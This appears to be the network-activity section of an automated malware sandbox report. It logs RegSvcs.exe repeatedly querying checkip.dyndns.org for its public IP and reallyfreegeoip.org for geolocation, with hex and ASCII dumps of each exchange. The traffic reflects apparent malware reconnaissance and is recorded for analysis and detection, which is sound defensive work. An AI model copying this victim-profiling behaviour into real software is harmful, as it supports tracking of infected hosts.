                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                           Jan 2, 2025 20:19:45.573493004 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:45.674526930 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:45 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: cd402f1555efa831d3c51df8c8efea76
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                           Jan 2, 2025 20:19:46.918324947 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:47.021224976 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:46 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 59624faf939fdd7c0974d62f6d84347a
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           1           192.168.2.5  49729        193.122.130.0   80                7276  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:47.638384104 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:48.198189974 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:48 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: c23470ebe43e95cc52a7186a773b33bc
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           2           192.168.2.5  49732        193.122.130.0   80                7276  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:48.975334883 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:49.445928097 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:49 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 26282847bd82832f3188bd7508a9094a
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           3           192.168.2.5  49734        193.122.130.0   80                7620  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:49.586551905 CET  151                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jan 2, 2025 20:19:50.086275101 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 993842b516ebc0d3c28604af39b9ada9
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                           Jan 2, 2025 20:19:50.089476109 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:50.193069935 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 171a67158c2631304904e69a2296f55c
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                           Jan 2, 2025 20:19:50.902162075 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:51.119294882 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:51 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 59f00d6e3911ed5d51fedfd8d9101934
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           4           192.168.2.5  49736        193.122.130.0   80                7276  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:50.085854053 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:50.570532084 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 49057de244c330356e9c3ed8a0a9b78e
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           5           192.168.2.5  49745        193.122.130.0   80                7276  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:51.369352102 CET  151                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jan 2, 2025 20:19:52.042634964 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:51 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 8525e8690d52d7e188dc806ccb06a8b3
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           6           192.168.2.5  49750        193.122.130.0   80                7620  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:51.772279978 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:52.335079908 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:52 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 358d1be87af0a5f22903f518f6eaa6e9
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           7           192.168.2.5  49758        193.122.130.0   80                7276  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:52.698997974 CET  151                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jan 2, 2025 20:19:53.209826946 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:53 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 72f846246538123d96cab9834988e4de
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           8           192.168.2.5  49761        193.122.130.0   80                7620  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:52.986107111 CET  127                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                           Jan 2, 2025 20:19:53.461972952 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:53 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: ef29c273f63aecd3b87261ea6396d259
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           9           192.168.2.5  49769        193.122.130.0   80                7276  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:53.823753119 CET  151                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:54.375389099 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:54 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 590fa648f1b03c99c8701acd7bb9110c
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          10 | 192.168.2.5 | 49773 | 193.122.130.0 | 80 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jan 2, 2025 20:19:54.103944063 CET | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:54.599114895 CET | 321 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:54 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: e149e8219bbdefe0063bac7b8d95a93a
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          11 | 192.168.2.5 | 49783 | 193.122.130.0 | 80 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jan 2, 2025 20:19:55.399588108 CET | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:56.156508923 CET | 321 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:56 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 85160bf011ee28d3df22d10749debdd5
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          12 | 192.168.2.5 | 49796 | 193.122.130.0 | 80 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jan 2, 2025 20:19:56.810107946 CET | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:57.263945103 CET | 321 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:57 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 21cba1ba304f78b4ca4453dc7f25c2aa
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          13 | 192.168.2.5 | 49802 | 193.122.130.0 | 80 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jan 2, 2025 20:19:57.882436037 CET | 151 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:58.545856953 CET | 321 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:58 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: f526cc3d0a1f6366a5c61fbcab4e835b
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.5 | 49725 | 188.114.97.34 | 443 | 7276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:46 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:46 UTC | 859 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:46 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160375
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7015NI8%2FTfGQQZdzdCapIK6Oc0JVVp%2FJHg1OiTO%2BVlwn6%2FR9aOC8nCGAHYmm9xkJKzQvE6cfe%2BaMRqIegUyxypJgfvfhmXQFajNcEh9wFMCzNymzTkBeanGcuXdI8kt15b2guvl"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a459a740cb4-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1625&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1692753&cwnd=245&unsent_bytes=0&cid=8f243d4bdeebc19e&ts=667&x=0"
                                          2025-01-02 19:19:46 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          1 | 192.168.2.5 | 49728 | 188.114.97.34 | 443 | 7276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:47 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2025-01-02 19:19:47 UTC | 855 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:47 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160376
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sKXixcALsXUdLMTWUu8PH7jVFbKpNhx9bZHVuK626xi8VfGK6ppCxESdhi3S%2BEJEkMBvAXzusJGiLFnX2Nmvya2cGK63pfPM5h68KIc86knOTbVuzdALjagIWr%2BdwqkJzQDvp%2F7"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a4a4c3bc35f-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1761&rtt_var=713&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1658148&cwnd=177&unsent_bytes=0&cid=70226427c85c8b3d&ts=140&x=0"
